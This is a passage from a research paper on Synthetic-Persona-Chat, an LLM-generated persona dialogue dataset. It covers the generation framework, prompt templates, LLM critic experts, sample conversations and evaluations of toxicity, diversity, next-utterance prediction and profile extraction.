Thomas Hartvigsen, Saadia Gabriel, Hamid Palangi, Maarten Sap, Dipankar Ray, and Ece Kamar. 2022. Toxigen: A large-scale machine-generated dataset for adversarial and implicit hate speech detection. ArXiv, abs/2203.09509.
He et al. (2023)
Xingwei He, Zheng-Wen Lin, Yeyun Gong, Alex Jin, Hang Zhang, Chen Lin, Jian Jiao, Siu Ming Yiu, Nan Duan, and Weizhu Chen. 2023. Annollm: Making large language models to be better crowdsourced annotators. ArXiv, abs/2303.16854.
Honovich et al. (2022)
Or Honovich, Roee Aharoni, Jonathan Herzig, Hagai Taitelbaum, Doron Kukliansy, Vered Cohen, Thomas Scialom, Idan Szpektor, Avinatan Hassidim, and Yossi Matias. 2022. TRUE: Re-evaluating factual consistency evaluation. In Proceedings of the 2022 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, pages 3905–3920, Seattle, United States. Association for Computational Linguistics.
Humeau et al. (2020)
Samuel Humeau, Kurt Shuster, Marie-Anne Lachaux, and Jason Weston. 2020. Poly-encoders: Transformer architectures and pre-training strategies for fast and accurate multi-sentence scoring.
Kim et al. (2023)
Hyunwoo Kim, Jack Hessel, Liwei Jiang, Peter West, Ximing Lu, Youngjae Yu, Pei Zhou, Ronan Le Bras, Malihe Alikhani, Gunhee Kim, Maarten Sap, and Yejin Choi. 2023. Soda: Million-scale dialogue distillation with social commonsense contextualization.
Kumar et al. (2020)
Varun Kumar, Ashutosh Choudhary, and Eunah Cho. 2020. Data augmentation using pre-trained transformer models. ArXiv, abs/2003.02245.
Lazaridou et al. (2021)
Angeliki Lazaridou, Adhiguna Kuncoro, Elena Gribovskaya, Devang Agrawal, Adam Liska, Tayfun Terzi, Mai Gimenez, Cyprien de Masson d’Autume, Tomás Kociský, Sebastian Ruder, Dani Yogatama, Kris Cao, Susannah Young, and Phil Blunsom. 2021. Mind the gap: Assessing temporal generalization in neural language models. In Neural Information Processing Systems.
Lee et al. (2023)
Dong-Ho Lee, Jay Pujara, Mohit Sewak, Ryen W White, and Sujay Kumar Jauhar. 2023. Making large language models better data creators. In The 2023 Conference on Empirical Methods in Natural Language Processing (EMNLP).
Lee et al. (2022)
Young-Jun Lee, Chae-Gyun Lim, Yunsu Choi, Ji-Hui Lm, and Ho-Jin Choi. 2022. PERSONACHATGEN: Generating personalized dialogues using GPT-3. In Proceedings of the 1st Workshop on Customized Chat Grounding Persona and Knowledge, pages 29–48, Gyeongju, Republic of Korea. Association for Computational Linguistics.
Leszczynski et al. (2023)
Megan Leszczynski, Ravi Ganti, Shu Zhang, Krisztian Balog, Filip Radlinski, Fernando Pereira, and Arun Tejasvi Chaganty. 2023. Generating synthetic data for conversational music recommendation using random walks and language models. ArXiv, abs/2301.11489.
Lewkowycz et al. (2022)
Aitor Lewkowycz, Anders Andreassen, David Dohan, Ethan Dyer, Henryk Michalewski, Vinay Ramasesh, Ambrose Slone, Cem Anil, Imanol Schlag, Theo Gutman-Solo, Yuhuai Wu, Behnam Neyshabur, Guy Gur-Ari, and Vedant Misra. 2022. Solving quantitative reasoning problems with language models.
Li et al. (2016)
Jiwei Li, Michel Galley, Chris Brockett, Georgios P. Spithourakis, Jianfeng Gao, and William B. Dolan. 2016. A persona-based neural conversation model. ArXiv, abs/1603.06155.
Lin and Chen (2023)
Yen-Ting Lin and Yun-Nung (Vivian) Chen. 2023. Llm-eval: Unified multi-dimensional automatic evaluation for open-domain conversations with large language models. ArXiv, abs/2305.13711.
Liu et al. (2022)
Junfeng Liu, Christopher T. Symons, and Ranga Raju Vatsavai. 2022. Persona-based conversational ai: State of the art and challenges. 2022 IEEE International Conference on Data Mining Workshops (ICDMW), pages 993–1001.
Liu et al. (2023)
Yang Liu, Dan Iter, Yichong Xu, Shuo Wang, Ruochen Xu, and Chenguang Zhu. 2023. G-eval: Nlg evaluation using gpt-4 with better human alignment. ArXiv, abs/2303.16634.
Madaan et al. (2023)
Aman Madaan, Niket Tandon, Prakhar Gupta, Skyler Hallinan, Luyu Gao, Sarah Wiegreffe, Uri Alon, Nouha Dziri, Shrimai Prabhumoye, Yiming Yang, Sean Welleck, Bodhisattwa Prasad Majumder, Shashank Gupta, Amir Yazdanbakhsh, and Peter Clark. 2023. Self-refine: Iterative refinement with self-feedback.
Massey et al. (2021)
Philip M Massey, Shawn C Chiang, Meredith Rose, Regan M Murray, Madeline Rockett, Elikem Togo, Ann C Klassen, Jennifer A Manganello, and Amy E Leader. 2021. Development of personas to communicate narrative-based information about the hpv vaccine on twitter. front digit health.
Mazaré et al. (2018)
Pierre-Emmanuel Mazaré, Samuel Humeau, Martin Raison, and Antoine Bordes. 2018. Training millions of personalized dialogue agents. In Proceedings of the 2018 Conference on Empirical Methods in Natural Language Processing, pages 2775–2779, Brussels, Belgium. Association for Computational Linguistics.
Mehri et al. (2022)
Shikib Mehri, Yasemin Altun, and Maxine Eskenazi. 2022. LAD: Language models as data for zero-shot dialog. In Proceedings of the 23rd Annual Meeting of the Special Interest Group on Discourse and Dialogue, pages 595–604, Edinburgh, UK. Association for Computational Linguistics.
Mehri and Eskénazi (2020)
Shikib Mehri and Maxine Eskénazi. 2020. Unsupervised evaluation of interactive dialog with dialogpt. In SIGDIAL Conferences.
Miller et al. (2017)
A. H. Miller, W. Feng, A. Fisch, J. Lu, D. Batra, A. Bordes, D. Parikh, and J. Weston. 2017. Parlai: A dialog research software platform. arXiv preprint arXiv:1705.06476.
Mündler et al. (2023)
Niels Mündler, Jingxuan He, Slobodan Jenko, and Martin T. Vechev. 2023. Self-contradictory hallucinations of large language models: Evaluation, detection and mitigation. ArXiv, abs/2305.15852.
Ouyang et al. (2022)
Long Ouyang, Jeff Wu, Xu Jiang, Diogo Almeida, Carroll L. Wainwright, Pamela Mishkin, Chong Zhang, Sandhini Agarwal, Katarina Slama, Alex Ray, John Schulman, Jacob Hilton, Fraser Kelton, Luke E. Miller, Maddie Simens, Amanda Askell, Peter Welinder, Paul Francis Christiano, Jan Leike, and Ryan J. Lowe. 2022. Training language models to follow instructions with human feedback. ArXiv, abs/2203.02155.
Pedregosa et al. (2011)
F. Pedregosa, G. Varoquaux, A. Gramfort, V. Michel, B. Thirion, O. Grisel, M. Blondel, P. Prettenhofer, R. Weiss, V. Dubourg, J. Vanderplas, A. Passos, D. Cournapeau, M. Brucher, M. Perrot, and E. Duchesnay. 2011. Scikit-learn: Machine learning in Python. Journal of Machine Learning Research, 12:2825–2830.
Pruitt and Grudin (2003a)
John Pruitt and Jonathan Grudin. 2003a. Personas: Practice and theory. In Proceedings of the 2003 Conference on Designing for User Experiences, DUX ’03, page 1–15, New York, NY, USA. Association for Computing Machinery.
Pruitt and Grudin (2003b)
John S. Pruitt and Jonathan T. Grudin. 2003b. Personas: practice and theory. In Conference on Designing for User eXperiences.
Raffel et al. (2019)
Colin Raffel, Noam M. Shazeer, Adam Roberts, Katherine Lee, Sharan Narang, Michael Matena, Yanqi Zhou, Wei Li, and Peter J. Liu. 2019. Exploring the limits of transfer learning with a unified text-to-text transformer. ArXiv, abs/1910.10683.
Schick and Schütze (2021)
Timo Schick and Hinrich Schütze. 2021. Generating datasets with pretrained language models. ArXiv, abs/2104.07540.
Shin et al. (2021)
Richard Shin, Christopher Lin, Sam Thomson, Charles Chen, Subhro Roy, Emmanouil Antonios Platanios, Adam Pauls, Dan Klein, Jason Eisner, and Benjamin Van Durme. 2021. Constrained language models yield few-shot semantic parsers. In Proceedings of the 2021 Conference on Empirical Methods in Natural Language Processing, pages 7699–7715, Online and Punta Cana, Dominican Republic. Association for Computational Linguistics.
Shum et al. (2019)
Michael Shum, Stephan Zheng, Wojciech Kryscinski, Caiming Xiong, and Richard Socher. 2019. Sketch-fill-a-r: A persona-grounded chit-chat generation framework. ArXiv, abs/1910.13008.
Shuster et al. (2022)
Kurt Shuster, Jing Xu, Mojtaba Komeili, Da Ju, Eric Michael Smith, Stephen Roller, Megan Ung, Moya Chen, Kushal Arora, Joshua Lane, Morteza Behrooz, W.K.F. Ngan, Spencer Poff, Naman Goyal, Arthur D. Szlam, Y-Lan Boureau, Melanie Kambadur, and Jason Weston. 2022. Blenderbot 3: a deployed conversational agent that continually learns to responsibly engage. ArXiv, abs/2208.03188.
Sutskever et al. (2014)
Ilya Sutskever, Oriol Vinyals, and Quoc V. Le. 2014. Sequence to sequence learning with neural networks. ArXiv, abs/1409.3215.
van Pinxteren et al. (2020)
Michelle van Pinxteren, Mark Pluymaekers, and Jos Lemmink. 2020. Human-like communication in conversational agents: a literature review and research agenda. Journal of Service Management, ahead-of-print.
Vaswani et al. (2017)
Ashish Vaswani, Noam M. Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N. Gomez, Lukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. In NIPS.
Veselovsky et al. (2023)
Veniamin Veselovsky, Manoel Horta Ribeiro, Akhil Arora, Martin Josifoski, Ashton Anderson, and Robert West. 2023. Generating faithful synthetic data with large language models: A case study in computational social science.
Wang et al. (2023a)
Boxin Wang, Weixin Chen, Hengzhi Pei, <PRESIDIO_ANONYMIZED_PERSON>, <PRESIDIO_ANONYMIZED_PERSON>, Chenhui Zhang, Chejian Xu, Zidi Xiong, Ritik Dutta, Rylan Schaeffer, Sang Truong, Simran Arora, Mantas Mazeika, Dan Hendrycks, Zi-Han Lin, Yuk-Kit Cheng, Sanmi Koyejo, Dawn Xiaodong Song, and Bo Li. 2023a. Decodingtrust: A comprehensive assessment of trustworthiness in gpt models. ArXiv, abs/2306.11698.
Wang et al. (2023b)
Xiaolei Wang, Xinyu Tang, Wayne Xin Zhao, Jingyuan Wang, and Ji-Rong Wen. 2023b. Rethinking the evaluation for conversational recommendation in the era of large language models.
Wang et al. (2021)
Zirui Wang, Adams Wei Yu, Orhan Firat, and Yuan Cao. 2021. Towards zero-label language learning. ArXiv, abs/2109.09193.
Wei et al. (2023)
Jason Wei, Xuezhi Wang, <PRESIDIO_ANONYMIZED_PERSON>, Maarten Bosma, Brian Ichter, Fei Xia, Ed Chi, Quoc Le, and Denny Zhou. 2023. Chain-of-thought prompting elicits reasoning in large language models.
Welleck et al. (2019)
Sean Welleck, Jason Weston, Arthur Szlam, and Kyunghyun Cho. 2019. Dialogue natural language inference.
Wu et al. (2019)
Chien-Sheng Wu, Andrea Madotto, Zhaojiang Lin, Peng Xu, and Pascale Fung. 2019. Getting to know you: User attribute extraction from dialogues. In International Conference on Language Resources and Evaluation.
Xu et al. (2021)
Jing Xu, Arthur Szlam, and Jason Weston. 2021. Beyond goldfish memory: Long-term open-domain conversation.
Yarowsky (1995)
David Yarowsky. 1995. Unsupervised word sense disambiguation rivaling supervised methods. In 33rd annual meeting of the association for computational linguistics, pages 189–196.
Zhang et al. (2018)
Saizheng Zhang, Emily Dinan, Jack Urbanek, Arthur D. Szlam, Douwe Kiela, and Jason Weston. 2018. Personalizing dialogue agents: I have a dog, do you have pets too? In Annual Meeting of the Association for Computational Linguistics.
Zhang et al. (2019)
Tianyi Zhang, Varsha Kishore, Felix Wu, Kilian Q. Weinberger, and Yoav Artzi. 2019. Bertscore: Evaluating text generation with bert. ArXiv, abs/1904.09675.
Zhang et al. (2020)
Yizhe Zhang, Siqi Sun, Michel Galley, Yen-Chun Chen, Chris Brockett, Xiang Gao, Jianfeng Gao, Jingjing Liu, and Bill Dolan. 2020. Dialogpt: Large-scale generative pre-training for conversational response generation.
Zhong et al. (2020)
Peixiang Zhong, Yao Sun, Yong Liu, Chen Zhang, Hao Wang, Zaiqing Nie, and Chunyan Miao. 2020. Endowing empathetic dialogue systems with personas. ArXiv, abs/2004.12316.
Zhou et al. (2019)
Li Zhou, Jianfeng Gao, Di Li, and Heung-Yeung Shum. 2019. The design and implementation of xiaoice, an empathetic social chatbot.
Zhuo et al. (2023)
Terry Yue Zhuo, Yujin Huang, Chunyang Chen, and Zhenchang Xing. 2023. Red teaming chatgpt via jailbreaking: Bias, robustness, reliability and toxicity.
Appendix A Dataset Generation Framework
In this section, we provide more details on our synthetic dataset generation framework. We created Synthetic-Persona-Chat using an LLM with 24 billion parameters. We use top-k sampling with k=40 for decoding during generation, and set the temperature value to 0.7 in all components. We give more details on user and conversation generation components in the following subsections.
A.1 User Generation
In our framework, the user generation component consists of two steps: expanding the persona attribute set, and creating realistic user profiles. In this section we provide details on our framework for these two steps:
Persona Expansion
As described in Section 3.1.1, the persona expansion step involves identifying persona categories in the initial persona attribute set Π0, generating queries associated with those categories, and bootstrapping queries to create a query set Q. In our framework, we employ the Scikit-learn Pedregosa et al. (2011) implementation of an agglomerative clustering to identify persona categories following this clustering method: we represent each persona using a BERT-based representation. Our clustering approach is bottom-up, starting with each persona attribute as an individual cluster. At each step, we combine two clusters if their similarity exceeds a predetermined threshold of 0.1. The similarity of two clusters is measured using inter-cluster average cosine similarity. The process continues until no pair of clusters is more similar than the threshold.
After identifying the clusters, we sample 3 instances of persona attributes for each cluster, and prompt the LLM using the template in shown in section 3 to construct an initial query set Q0. We expand the query set Q0 using bootstrapping. At each step, we sample 5 instances from the available queries, and prompt the LLM using the template in Table 6. We repeat this process for 100 steps. Examples of initial persona attributes, induced queries, bootstrapped queries, and bootstrapped persona attributes can be found in Table 4. The prompt templates used in this component are available in Table 6.
User Profile Generation
We illustrate a sample user profile creation process in Figure 6. As shown in the figure, at each iteration, a randomly selected persona attribute is checked for consistency and non-redundancy.
Let π′ be a randomly selected persona attribute in an iteration. For the redundancy criteria, we use the BERT representation of persona attributes. We compute the similarity of the new candidate persona attribute π′ with every persona attribute in the user profile. If it is more than a threshold (0.9 in these experiments) similar to an attribute in the user profile, π′ is deemed as redundant and will not be added to the user profile. We use the cosine similarities of the BERT representations of the persona attributes.
For the consistency criteria, we use the NLI model to verify the consistency of this persona attribute with the user profile. For every persona attribute in the current user profile π, we prompt the LLM to create the negated persona attribute ¬π. Then, we query the NLI model to check whether ¬π is inferred by π′ or ¬π′ is inferred by π. If either of these cases is inferred, then the selected persona attribute is not consistent with the user profile, and not added to the profile.
Dataset
Persona Source
Query
Example Persona Attribute
Persona-Chat
Human
What is your job?
I am a pharmacist.
Where do you live?
I live close to the coast.
Do you have any pets?
I have a doberman.
LLM
What are your talents?
I am a great listener.
What is your hair color?
My hair is auburn.
What is your favorite song?
I like the song "Leather and Lace".
Wikipedia
Human
What are your hobbies?
I spend WAY too much time on Wikipedia.
What is your view on the metric system?
I find the metric system to be a logical and efficient way to measure things.
LLM
What is the name of the first album you ever purchased?
My first album was The Miseducation of Lauryn Hill
What are you interested in?
I’m looking to learn new recipes and improve my cooking skills.
Table 4: Persona Categories and Induced Queries Using Our Framework. Queries are generated by the Large Language Model (LLM). Queries for personas with the "LLM" as source, are generated through bootstrapping, while those with "human" as source are generated by sampling persona categories and prompting the LLM. Personas with "human" as the source are authored by humans, while "LLM" rows represent personas generated using our framework.
Refer to caption
Figure 6: User Profile Construction Example
A.2 Conversation Generation
LLM-based Critic
In our framework, the critic is implemented by prompting an LLM. We included a mixture of experts approach in the critic, where each expert prompts the LLM to assess a specific policy in the candidate conversations. Our framework includes a set of experts to control the general conversation quality. We evaluate the performance of these experts using a baseline dataset. The baseline dataset for this experiment is FED which consists of 125 human-annotated instances evaluated at the conversation level. We pair the conversations and evaluate the experts based on the number of correctly ranked pairs. As shown in Table 5, we observe that these experts are more than 80% accurate in distinguishing the better conversation within the pairs. The template for the verbalized form of these experts used in our framework can be found in Table 6.
Policy Performance
Depth 0.84
Coherency 0.96
Consistency 0.92
Diversity 0.92
Likable 0.88
Table 5: List of FED Experts for Persona-Based Conversation Generation Critic. Performance is measured by the number of correctly compared conversation pairs in FED baseline based on the given policy.
Component
Template
Query Induction
What is the most specific question that you are replying to with the following statements?
{persona-category-sample-1}
{persona-category-sample-2}
{persona-category-sample-3}
Query Bootstrapping
{cluster-query-1}
…
{cluster-query-5}
Add more persona questions similar to the above examples.
Persona Bootstrapping
Imagine you are a person with the following persona.
{random-persona-attribute-1}
…
{random-persona-attribute-5}
{query}. Answer with only one short sentence that starts with ’I’ or ’My’. Do not repeat the given persona.
FED Expert
Which one of Conversation 1 and Conversation 2 between two users {policy}? Why?
Conversation 1: {conv-1}
Conversation 2: {conv-2}
Toxicity Expert
Is this conversation toxic? Why?
Conversation: {conv}
Conversation Generation
Here, we list the profiles of two users, user 1 and user 2, followed by an interesting and natural conversation between user 1 and user 2, which implicitly reflects their user profiles.
User 1 Profile: {conversation1-user-1}
User 2 Profile: {conversation1-user-2}
Conversation: {conversation-1}
…
User 1 Profile: {conversation-5-user-1}
User 2 Profile: {conversation-5-user-2}
Conversation: {conversation-5}
Give me more examples like this. The conversation must be more than 5 turns and less than 8 turns. The conversation must be natural, and not direct copies of their profiles.
User 1 Profile: {user-1}
User 2 Profile: {user-2}
Faithfulness Expert
Given user 1 and user 2’s profiles respectively, does the following conversation between the two users contradict either of their profiles? Why?
User 1 Profile: {user-1}
User 2 Profile: {user-2}
Conversation: {conv-1}
Response: {explanation}
Table 6: Prompting Templates for Large Language Models of Different Components in Our Framework. Variables enclosed in {} are filled when the template is populated.
We also included a toxicity expert and a persona faithfulness expert in the critic. The prompt templates used in these experts are available in Table 6. The persona faithfulness leverages in-context- learning capability of LLMs. It includes a few human-curated examples of faithful and unfaithful conversations in the instruction prompt. Refer to Table 7 for examples of faithful and unfaithful conversations used in the instruction prompt.
User Profiles
Conversations
Faithfulness Explanation
User 1:
One of my favorite hobbies is gaming.
I currently work in an office.
I enjoy running
User 2:
I am applying for publishing jobs.
My mother is a librarian.
The only autographs I’ve ever wanted are from authors.
I used to wear glasses as a child.
My favorite color is green.
User 1: Do you like video games?
User 2: No, I do not like video games.
User 1: What do you do for a living?
User 2: I am a librarian.
User 1: I guess that is why you like to read a lot.
User 2: Yes, I like to read books.
User 1: What is your favorite color? Mine is green.
User 2: That is my favorite color too.
User 1: That is cool.
User 2: Do you have any pets?
User 1: No, I do not have any pets.
User 2: I have a dog and a cat.
User 1: That is cool.
User 2: Do you have any hobbies?.
User 1: Yes, I like to write.
User 2: What do you write about?
User 1: I write about my life.
User 2: That is cool.
User 1: Thanks!
No, the conversation does not contradict the profiles. Neither user 1 nor user 2 says anything that contradicts their respective profiles. Although the conversation does not cover everything in their profiles, that is ok.
User 1:
I would like to move some place warmer.
I m an out of work farmhand.
I like watching reality television shows.
I live in Kansas.
User 2:
I am studying to be a dentist.
My favorite team is the raptors.
My favorite band is rise against.
I usually go to bed late.
I like sports.
User 1: It’s so cold in Kansas, I want to go some place warmer.
User 2: I am studying dentistry.
User 1: I am an out of work farmhand, I love reality tv.
User 2: I like the raptors and rise against, I go to bed late.
User 1: It is very hard to find work here, I might need to go to the city.
User 2: I don’t like sports , but I like the raptors .
User 1: I would like to work as a model, but I have no experience.
User 2: I am applying for a job as a receptionist.
User 1: I am very jealous, I hope you get it.
Yes, the conversation contradicts user 2’s profile. In the profile, user 2 says they like sports, however, in the conversation, user 2 says they don’t like sports.
User 1:
My family is from Kazakhstan.
I can speak Spanish, English, and Kazakh.
I like to go hiking on the weekends.
I play jazz piano in a band.
I am a barista.
User 2:
I am a vegan.
I love game of thrones.
I like soccer.
My brother used to be in the navy.
User 1: Hi, what do you do for a living?
User 2: I am a barista.
User 1: Awesome, me too! Where are you from?
User 2: My family is from Kazakhstan, but I was born in Uruguay.
User 1: Cool . What do you like to do in your free time?
User 2: I love to go hiking and play jazz piano.
User 1: Wow, that sounds really nice. I like to watch game of thrones and play soccer.
User 2: I have never seen game of thrones, but I love soccer.
User 1: You should watch it, it is really good.
User 2: I will check it out.
Yes, the conversation contradicts user 2’s profile. In the profile, user 2 says they love game of thrones, but in the conversation user 2 says they have never seen it.
User 1:
My favorite book is David Copperfield.
I have a twin brother.
I am really short.
I love to bake cakes.
I have won tap dance competitions.
User 2:
I enjoy spending a lot of money on my hobbies.
I love photography.
I like to use candles instead of lights.
I do not like waking up early.
User 1: Hi there! Do you like to read?
User 2: I like to read. I like to go to the library.
User 1: Oh, cool! What is your favorite book?
User 2: I really like David Copperfield. I have a twin brother and I am really short.
User 1: Are you good at baking?
User 2: I can bake cakes. I have won tap dance competitions.
User 1: Do you like photography?
User 2: I love taking pictures. I also like to use candles instead of lights.
User 1: Do you like to wake up early?
User 2: I like to sleep in. I do not like waking up early.
User 1: Do you like to spend money?
User 2: I love spending money on my hobbies.
No, the conversation does not contradict either user profiles. Although user 2 says they are really short, which is in user 1’s profile, it doesn’t mean user 2 cannot be really short too.
Table 7: Examples of Faithful and Unfaithful Conversations for Prompting the Persona Faithfulness Expert in Our Framework. The ‘Faithfulness explanation’ columns are used to fill the ‘explanation’ variable in the faithfulness expert template.
Appendix B Synthetic-Persona-Chat
Synthetic-Persona-Chat is made of 20k conversations, with an average of 11.8 turns per user for each. An example Synthetic-Persona-Chat conversation can be found in Table 8. We compare Synthetic-Persona-Chat to Persona-Chat across different dimensions. We first assess the characteristics of SPC using various automatic evaluators, i.e. evaluators which do not require human effort. We then conduct a human evaluation experiment on a subset of SPC.
User Profiles
Conversation
User 1
I am male.
My weakness are sweets.
I am unsociable.
I am a jack of all, master of none.
User 2
My favorite music is rock and roll.
I love to travel.
I am from Russia.
I enjoy skiing.
I go to school for business.
User 1: Hello
User 2: Hello, what’s your name?
User 1: My name is [name], and you?
User 2: My name is [name], I’m from Russia.
User 1: Nice to meet you, [name]. I’m from the United States.
User 2: It’s nice to meet you too, [name]. What are you interested in?
User 1: I’m interested in a lot of things, but my main interests are music and travel.
User 2: I love music too! What kind of music do you like?
User 1: I like a lot of different kinds of music, but my favorite is rock and roll.
User 2: Me too! I love classic rock and roll. Who are your favorite bands?
User 1: My favorite bands are The Beatles, The Rolling Stones, and Led Zeppelin.
User 2: Those are all great bands! I love them too.
User 1: What about you, what are your favorite bands?
User 2: My favorite bands are The Doors, Pink Floyd, and Queen.
User 1: Those are all great bands too! I love them too.
User 2: So, what do you like to do for fun?
User 1: I like to go to concerts, play video games, and watch movies.
User 2: I love going to concerts too! I also like to go skiing and play tennis.
User 1: I love skiing too! I haven’t played tennis in a while, but I used to play a lot.
User 2: We should go skiing together sometime!
User 1: That would be fun! I’m free this weekend if you are.
User 2: I’m free this weekend too! We should go skiing.
User 1: Great! I’ll text you the details.
Table 8: Sample Conversation from Synthetic-Persona-Chat. This conversation was synthesized from user profiles in Persona-Chat
B.1 Automatic Evaluation
We conduct a comprehensive analysis and evaluation of SPC across different dimensions and compare it against PC. We start by analyzing the toxicity and diversity of SPC using off the shelf tools. Then, we elaborate on the experiments which assess the efficacy of SPC used as the dataset for the next utterance prediction and the profile extraction tasks. Finally, we evaluate the quality of SPC conversations using LLM-based evaluation methods.
Toxicity Analysis
We analyze the toxicity of the generated conversations at the final iteration of SPC using an online tool called Perspective3
3
https://perspectiveapi.com/. We reproduce the results of a detailed analysis of toxicity in PC as well as in each iteration of our data generation framework while producing SPC in Table 9.
Toxicity Profanity
Confidence weak(< .2) medium(.2-.8) strong(>.8) weak(< .2) medium(.2-.8) strong(>.8)
PC 10875 4448 53 10891 1676 57
SPC Iter 1 10902 1192 3 10903 340 3
SPC Iter 2 10900 1096 1 10901 345 1
SPC Iter 3 10902 1088 1 10902 376 0
Table 9: Frequency of Toxic Conversations in Persona-Chat and Synthetic-Persona-Chat
We observe a notable reduction in the frequency of conversations deemed as strongly toxic or profane throughout the iterations of generating SPC. This reduction can be attributed to the built-in toxicity filter of the employed LLM. While PC contains more than 50 samples that are identified as strongly toxic, SPC includes at most three toxic or profane conversations, which is significantly lower (at least 15 times less). Interestingly, the fraction of conversations with medium profanity and toxicity in SPC is 4 times less than the same type of conversations in PC across all iterations. We have removed any conversation that was marked as strongly toxic by this tool in the released dataset. Samples of toxic conversations are provided in Table 10.
Source
Conversation
Persona-Chat
…
User 1: I like bloody stuff.
User 2: It reminds me of the dark which makes me afraid of it.
User 1: You are a silly goose.
Persona-Chat
…
User 2: Cool. Why do you say that? Because I am a red head?
User 1: No. Ikn. Why do you ask so many questions? Mr. Thomas is dumb.
Synthetic-Persona-Chat
User 1: I can imagine. What’s your favorite part of the job?
User 2: I love working with my team and seeing our restaurant succeed.
User 1: That’s great. What’s your least favorite part of the job?
User2: My least favorite part is dealing with my boss. He’s a real jerk.
Table 10: Examples of Toxic Conversations. The first two examples are segments of conversations from Persona-Chat. The final example is a segment from a toxic conversation in Synthetic-Persona-Chat, which has been removed in the released dataset.
Diversity Analysis
We use hierarchical topic modeling Blei et al. (2004) to assess the topic diversity of SPC and compare it to that of PC. For a fair comparison, we only compare conversations in SPC with similar personas in PC. Table 11 displays the number of topics at each level of the topic tree, with the first level indicating the most general topic. We observe similar topic diversity at the first level. In deeper levels, there is a slightly lower diversity in SPC.
Topic Level PC SPC
1 27 27
2 232 213
3 470 403
4 137 118
5 30 26
Table 11: Vertical Topic Diversity in Persona-based Datasets
Next Utterance Prediction
We compare the performance of different models on the next utterance prediction task. As discussed in Section 4.2, these models are expected to exhibit better performance in the next utterance prediction task when user personas are provided as prior information. We evaluate ranking and generative models for response selection to assess this property. We compare models trained on SPC to the same models trained on PC. We use the implementations provided in Miller et al. (2017) for the following models:
•
IR Baseline Given an utterance as a query, the IR baseline finds the most similar utterance in the training corpus using tf-idf. It defines the utterance after the most similar utterance as the candidate response, and then returns the most similar option to that candidate as the output.
•
Transformer-Ranker The context of the conversation, as well as the candidate next utterances, are encoded using a BERT-based encoder. The most similar encoded candidate to the conversation context, as measured by a dot-product in their representation space, is selected as the output Humeau et al. (2020).
•
Transformer-Generator This model is a sequence-to-sequence model Sutskever et al. (2014) which uses transformers as encoders and decoders.
Persona-Chat Synthetic-Persona-Chat
Method Metric No Persona Self Persona Their Persona Both Personas No Persona Self Persona Their Persona Both Personas
IR baseline hit@1 0.1869 0.3683 0.1519 0.3281 0.1861 0.2596 0.1882 0.2493
Transformer(Ranker) hit@1 0.2513 0.275 0.1922 0.2572 0.7164 0.6227 0.6988 0.7214
Transformer hit@1 0.0896 0.08512 0.0873 0.0813 0.0526 0.629 0.053 0.051
(Generator) ppl 65.57 72.24 62.49 64.07 5.54 5.47 5.4 5.405
Table 12: Evaluation of Next Utterance Prediction models conditioned on different user personas.
We also evaluate the performance of the next utterance prediction models when given no user, one user, and both user personas. The results of this experiment are available in Table 12. We observe that the highest performance improvement for all models trained on PC is when self-personas are given as input. We do not observe such a pattern in SPC. This indicates a higher degree of bidirectionality in SPC conversations compared to those of PC.
Profile Extraction
A potential use-case of the SPC dataset is training a model to predict user personas from a conversation. This is only possible if the dataset is highly faithful, meaning that any persona attribute inferred from the conversation is in the user profile or compatible with the user profile. In this context, a faithful conversation is expected to have high precision in the profile extraction task, while a conversation that highly reflects user personas is expected to have high recall in this task.
We evaluate the task of user profile extraction for conversations in SPC, and compare the results against those of PC. We frame the task of profile extraction as a ranking task, using the utterances within the conversations as queries. The goal is to rank a set of persona attribute options. For each conversation, we include the speakers’ persona attributes in the available options. Additionally, we select 25 random user persona attributes from other speaker profiles within the dataset to serve as distractors. The input to the profile extraction is utterances from a single user as the speaker, while the output is a list of persona attribute options for a target user, which could be either user 1 or user 2. The results of this experiment are presented in Table 13. We observe that the performance of the profile extraction methods is higher in SPC in 3 of the 4 scenarios. Interestingly, we observe that with both datasets, when the target and the speaker are different, the performance of profile extraction is greater compared to the cases when the target and speaker users are the same.
F-Score
Target Speaker PC SPC
user 1 user 1 0.505 0.574
user 1 user 2 0.737 0.68
user 2 user 1 0.50 0.57
user 2 user 2 0.456 0.494
Table 13: Accuracy of Profile Extraction in Four Different Scenarios. The ‘Target’ column represents the user profile to be extracted, while the ‘Speaker’ column indicates the speaker of the turns given to the model as input.
LLM-based Quality Evaluation
We leverage LLM-based conversation quality evaluators from the literature to compare the quality of SPC and PC. These evaluators rely on the human curated prompt templates for different metrics including consistency, fluency, etc. We used these evaluators with minimum change in the original prompt templates. These evaluators are:
•
LLM-Eval Lin and Chen (2023) is a multi-dimensional automatic evaluation designed for conversations. It uses a human-curated prompt which describes evaluation dimensions, serving as a unified evaluation schema. This prompt evaluates the conversation across multiple dimensions (e.g. fluency) in a single model call. We show this unified schema in Table 14.
•
GPT-Score Fu et al. (2023) leverages emergent abilities of LLMs, i.e. zero-shot instructions, to score texts. It contains a prompt template, and for each quality criterion, populates the template with a human description of the criteria along with the valid score range for that criteria. Example prompts are provided in Table 14.
•
G-Eval Liu et al. (2023) introduces a framework that employs LLMs with a chain-of-thought approach to assess the quality of natural language generated outputs. For any evaluation criteria, G-Eval prompts the LLM with the criterion’s description, prompting the model to generate the necessary evaluation steps. It then uses these steps to prompt the LLM to score given output for that criterion. It considers the probability of getting each permissible score as the output of the prompt, i.e., it considers the probability distribution of scores assigned by the LLM. The reported output is the expected value of the score distribution by the LLM. Table 14 includes an example prompt.
Evaluator
Metric
Prompt Template
LLM-Eval
All
Human: The output should be formatted as a JSON instance that conforms to the JSON schema below.
As an example, for the schema {"properties": {"foo": {"title": "Foo", "description": "a list of strings", "type": "array", "items": {"type": "string"}}}, "required": ["foo"]}} the object {"foo": ["bar", "baz"]} is a well-formatted instance of the schema. The object {"properties": {"foo": ["bar", "baz"]}} is not well-formatted.
Here is the output schema: {"properties": {"content": {"title": "Content", "description": "content score in the range of 0 to 100", "type": "integer"}, "grammar": {"title": "Grammar", "description": "grammar score in the range of 0 to 100", "type": "integer"}, "relevance": {"title": "Relevance", "description": "relevance score in the range of 0 to 100", "type": "integer"}, "appropriateness": {"title": "Appropriateness", "description": "appropriateness score in the range of 0 to 100", "type": "integer"}}, "required": ["content", "grammar", "relevance", "appropriateness"]}
Score the following dialogue generated on a continuous scale from {score-min} to {score-max}.
Dialogue: {dialogue}
GPT-Score
Consistency
Answer the question based on the conversation between two users.
